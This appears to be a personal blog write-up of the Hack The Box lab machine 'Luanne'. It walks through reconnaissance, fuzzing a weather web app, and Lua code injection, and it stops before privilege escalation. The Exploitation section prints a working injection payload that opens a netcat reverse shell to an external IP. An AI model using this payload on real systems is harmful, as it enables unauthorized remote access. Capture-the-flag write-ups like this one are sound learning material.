Luanne ~ Hack The Box

CTFs Feb 14, 2021

Prerequisite

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

echo "10.10.10.215	luanne.htb" >> /etc/hosts
hosts file entry

Okay now onto the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

 nmap -Pn -sC -sV -oN initial luanne.htb

Scanning & Enumeration

Based on the scan that was run, I realized that port 80 was running a web server. This was the web app that was being served!

I was unauthorized to access the site. However, I found directory which was listed in robots.txt.

Thus, I ran a directory brute force attack against it using gobuster.

I found that /weather/forecast was a valid directory.

Accessing it gave me this message. I inferred and input a parameter in the URL.

My next order of business was to run a parameter fuzz attack on ?city=. I used an Intruder attack from Burpsuite for that. I also used a custom fuzz list which I found over at Github.

The fuzz attack revealed that the weather was a .lua file. Thus, I started thinking if I could get remote code execution by tampering the parameters.

Exploitation

The first step was to confirm if the theory would work. For that, I used a simple payload to run the command whoami.

Now that I had confirmed that I had RCE, it was time to craft a payload to get a reverse shell. After constructing the payload, I had to URL encode it.

neewashere') os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.47 666 >/tmp/f')--

I uncovered that the machine was running netBSD while doing enumeration. Thus, I picked a OpenBSD based netcat reverse shell which I found here.

Lateral Movement

Now that I had a shell into the machine, I busted out linpeas.sh and tried to enumerate the machine further.

Linpeas revealed that there was a password hash which was located in the root web directory.

Next up, I fired up john to try and crack the password.

Still trying to crack :(

Privilege Escalation

Haven't even gotten the user flag :(

Tags